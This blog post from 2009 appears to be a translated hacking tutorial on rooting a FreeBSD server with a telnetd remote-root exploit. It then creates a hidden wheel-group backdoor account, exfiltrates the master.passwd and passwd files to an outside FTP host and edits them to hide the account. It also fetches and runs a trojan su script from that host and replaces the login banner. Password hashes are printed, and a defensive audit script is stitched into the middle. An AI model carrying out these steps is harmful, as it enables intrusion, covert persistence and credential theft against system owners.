Saturday, 08 August 2009

Stealth Login to FreeBSD

Viva script kiddies, because I'm not a hacker :P~ but a lamer. First of all, obviously you need a shell to use as your starting capital for rooting the FreeBSD server; which exploit you use is up to you, you surely understand that better than I do. As an example I'll use the remote telnetd exploit 7350854.c

Example:
[lee@linux .lee]$ ./bsd target.com

7350854 - x86/bsd telnetd remote root
by zip, lorian, smiler and scut.

check: PASSED, using 16mb mode

######################################

ok baby, times are rough, we send 16mb traffic to the remote telnet daemon process, it will spill badly. but then,
there is no other way, sorry...

## setting populators to populate heap address space
## number of setenvs (dots / network): 31500
## number of walks (percentage / cpu): 496140750
##
## the percentage is more realistic than the dots ;)

percent |-----------------------------------| ETA |
19.19% |......................... | 00:49:32 |

OK, we wait until we get root.

## sleeping for 10 seconds to let the process recover
## ok, you should now have a root shell
## as always, after hard times, there is a reward...


command: ÿý%id;uname -a;whoami
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 31(guest)
FreeBSD target.com 4.2-RELEASE FreeBSD 4.2-RELEASE #1: Sat Nov 25 10:13:58 CST 2000 root@target.com:/usr/src/sys/compile/MAIL i386
root

LOL! You can laugh with joy, you've got root. Now get your moves ready to secure your new FreeBSD shell, and add a user first:

/usr/sbin/pw adduser gue -g wheel -s /bin/tcsh -d /etc/.gue

Then make a home for yourself on the shell:

mkdir /etc/.gue

then school that shell so it can read and write:

/usr/sbin/chown gue.wheel -R /etc/.gue
chown: -R: No such file or directory

Wekz!!! Why "no such file"? Just ignore it, we're lamers after all (chown wants -R before the owner argument, not after it). Now let's set the password first:

passwd gue
New password:gue1234

Retype new password:gue1234

passwd: updating the database...
passwd: done
Changing local password for gue.

OK baby!! Now telnet to your new FreeBSD shell:

FreeBSD/i386 (target.com) (ttyp3)

login: gue
Password:*****

Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.

FreeBSD 4.2-RELEASE (MAIL) #1: Sat Nov 25 10:13:58 CST 2000

Welcome to FreeBSD!

Before seeking technical support, please use the following resources:

o Security advisories and updated errata information for all releases are at http://www.FreeBSD.org/releases/ - always consult the ERRATA section for your release first as it's updated frequently.

o The Handbook and FAQ documents are at http://www.freebsd.org/ and, along with the mailing lists, can be searched by going to http://www.FreeBSD.org/search.html. If the doc distribution has been installed, they're also available formatted in /usr/share/doc.

If you still have a question or problem, please take the output of `uname -a', along with any relevant error messages, and email it as a question to the questions@FreeBSD.org mailing list. If you are unfamiliar with FreeBSD's directory layout, please refer to the hier(7) man page. If you are not familiar with man pages, type "man man".
You may also use `/stand/sysinstall' to re-enter the installation and configuration utility. Edit /etc/motd to change this login announcement.

>

Now let's mix the spices. Go back to the root shell from earlier and look at the master.passwd and passwd files:

cat /etc/master.passwd
s163:pUUA5f8KSAvAo:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:whrd1YujBvuWI:1566:1040::0:0:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:$1$MDoybd3Y$OBWMzMHYU8WJkRAU8hSP00:6925:0::0:0:User &:/etc/.pupet:/bin/tcsh

There's a new entry in that file; hmm, the admin could get suspicious. Let's look at the passwd file too:

cat /etc/passwd
syscpa:*:1564:1040:teachers part-time 20020506:/home/professor/ACCT/syscpa:/usr/local/util/msman
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:*:6925:0:User &:/etc/.pupet:/bin/tcsh

Phew, it's there too. OK, relax, let's go to the /etc folder:

cd /etc

Hmm, so what now?... Fine, we open ftp (use your own ftp account somewhere, wherever you like):

ftp
open uhamka-student.net
uhamka-student.net <-= enter your login
Password:***** <-= enter your password

After that, send the master.passwd and passwd files to your ftp account:

put master.passwd

then the passwd file:

put passwd

After that, download the master.passwd and passwd files from your ftp account and edit them: open master.passwd in notepad.

s163:pUUA5f8KSAvAo:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:whrd1YujBvuWI:1566:1040::0:0:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:$1$MDoybd3Y$OBWMzMHYU8WJkRAU8hSP00:6925:0::0:0:User &:/etc/.pupet:/bin/tcsh <-= delete this one

so what's left is:

s163:pUUA5f8KSAvAo:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:whrd1YujBvuWI:1566:1040::0:0:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman

then save the file.

After that, open the other file, passwd, and just like before delete the entry you just created when you added the user:

s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:*:6925:0:User &:/etc/.pupet:/bin/tcsh <-= delete this one too

giving:

s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman

then save it.

Delete the master.passwd and passwd files on your ftp account, upload the edited master.passwd and passwd to your ftp account instead, and then delete the original files on the box you rooted:

rm master.passwd
rm passwd

Replace them with the edited master.passwd and passwd that you uploaded to your ftp account, i.e. send your edited master.passwd and passwd back to that shell.

Let's look at the result:

cat /etc/passwd
syscpa:*:1564:1040:teachers part-time 20020506:/home/professor/ACCT/syscpa:/usr/local/util/msman
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman

Oops!! It's gone. So our new account is lost, then? Hmm, no it isn't, friend. Try telnetting in again with the user and password you created earlier; let's test it:

FreeBSD/i386 (target.com) (ttyp4)
login: gue
Password:
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.

PUPET and AxAL At #cracxer IRC.DAl.net Welcome Guys Sorry for the admin <-= I replaced the motd file


Fiuuuh masih bisa masuk, khan sudah di hapus ?? <-= jangan tanya saya, be 'coz saya khan cuma lamers, hehehehe, trus anda puas dengan hasil anda ini ngak khan..??, anda pasti ingin mendapetkan akses root, gampang saja anda tinggal cari local exploit untuk mendapatkan akses root, oke sekarang kita ambil script nya, jangan lupa root box anda tutup saja,dan anda menggunakan account baru, terus anda ambil scriptnya yang sudah anda siapkan di ftp account anda
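Why the login still works, and how an admin would catch it: FreeBSD's login and su consult the compiled databases /etc/pwd.db and /etc/spwd.db that pwd_mkdb(8) builds from master.passwd, so hand-editing the text files leaves the account alive in the database. The POSIX sh audit below is an added example, not code from the original post; it compares a master.passwd file with what the account database answers (assumed to be master.passwd-format lines, as `pw usershow -a` prints them on a live host) and flags the two traits of the account added above, using constructed samples copied from the listings in this post.

```shell
#!/bin/sh
# Added audit example (not from the original post). It looks for two traces
# of the procedure above: accounts the compiled database still answers but
# the text master.passwd no longer lists, and accounts whose shape matches
# the one created with pw(8). Both inputs below are constructed samples.

# Constructed: /etc/master.passwd after the "gue" line was removed by hand.
MASTER_TXT='s163:pUUA5f8KSAvAo:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:whrd1YujBvuWI:1566:1040::0:0:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman'

# Constructed: what the account database still returns (master.passwd
# format, as `pw usershow -a` prints it), because pwd_mkdb never re-ran.
DB_TXT='s163:*:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040::0:0:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:*:6925:0::0:0:User &:/etc/.pupet:/bin/tcsh'

# ghost_accounts MASTER DB: user names present in DB but absent from MASTER.
ghost_accounts() {
    printf '%s\n' "$2" | cut -d: -f1 | while IFS= read -r user; do
        [ -n "$user" ] || continue
        printf '%s\n' "$1" | cut -d: -f1 | grep -qxF -- "$user" \
            || printf '%s\n' "$user"
    done
}

# suspicious_accounts DB: non-root accounts whose primary group is gid 0
# (wheel) or whose home directory is a dot-directory such as /etc/.pupet.
# Fields: name:pw:uid:gid:class:change:expire:gecos:home:shell (home = $9).
suspicious_accounts() {
    printf '%s\n' "$1" | awk -F: '
        $4 == 0 && $1 != "root" { print $1 ": primary gid 0" }
        $9 ~ /\/\./             { print $1 ": hidden home " $9 }
    '
}

# audit_accounts MASTER DB: run both checks and print a short report.
audit_accounts() {
    findings="$(ghost_accounts "$1" "$2"; suspicious_accounts "$2")"
    if [ -z "$findings" ]; then
        echo "no findings"
    else
        printf 'findings:\n%s\n' "$findings"
    fi
}

audit_accounts "$MASTER_TXT" "$DB_TXT"
```

Any ghost account means the databases and the text file have diverged; after reviewing the entries, `pwd_mkdb -p /etc/master.passwd` rebuilds pwd.db, spwd.db and passwd from the file so the text and the database agree again.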

ftp> open uhamka-student.net
Connected to uhamka-student.net.
220 ProFTPD 1.2.4 Server (AEI Web Sites) [216.52.166.48]
Name (uhamka-student.net:pupet): uhamka-student.net
331 Password required for uhamka-student.net.
Password:******
230 User uhamka-student.net logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get evelyne.sh
local: evelyne.sh remote: evelyne.sh
227 Entering Passive Mode (211,101,151,167,121,20)
150 Opening ASCII mode data connection for evelyne.sh (1023 bytes).
100% 1055 00:00 ETA
226 Transfer complete.
1055 bytes received in 1.00 seconds (1.03 KB/s)
ftp> bye

Once you've fetched the script, cook it up as follows:

mv evelyne.sh su

change its mode:

chmod +x su

run the script:

>./su
Please hit ctrl-c twice...

now press CTRL + C (twice)

now login with user eric and password FLUE A COOK HOVE DOUR SKY
after you're logged in you can su to root with the same
password

Trying ::1...
Connected to localhost.
Escape character is '^]'.

FreeBSD/i386 (target.com) (ttyp4)
login:eric
pass :FLUE A COOK HOVE DOUR SKY

Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.

PUPET and AxAL At #cracxer IRC.DAl.net Welcome Guys Sorry for the admin
>su
s/key 97 de09623
Password:FLUE A COOK HOVE DOUR SKY
#id
uid=0(root) gid=0(root) groups=0(root), 2(kmem), 3(sys), 4(tty), 5(operator), 31(guest)
>
Well, fun, right? Once again, long live lamers and script kiddies. Thanks to all my friends at #cracxer Irc.dal.net, #cracxer will be back. Thanks once more to AXAl, who was willing to give his opinion and keep me company while I wrote this article, and also to petualang, kaka-joe, pak-tani, notts, babah, maffias who is asleep, ERNESTO_CHE_GUEVARRA (my clubbing buddy) heueheu VIVA #CRACXER

Exploit list.

You can get them at www.packetstormsecurity.org, www.neworder.box.sk

I feel this tutorial still has many "shortcomings" and needs deeper correction from the Experts, because once again I'm just a lamer, and very much a lamer.

-Thanks in advance for your criticism and suggestions, and to "Jasakom.com" for publishing this article by "this l@mer"; viva jasakom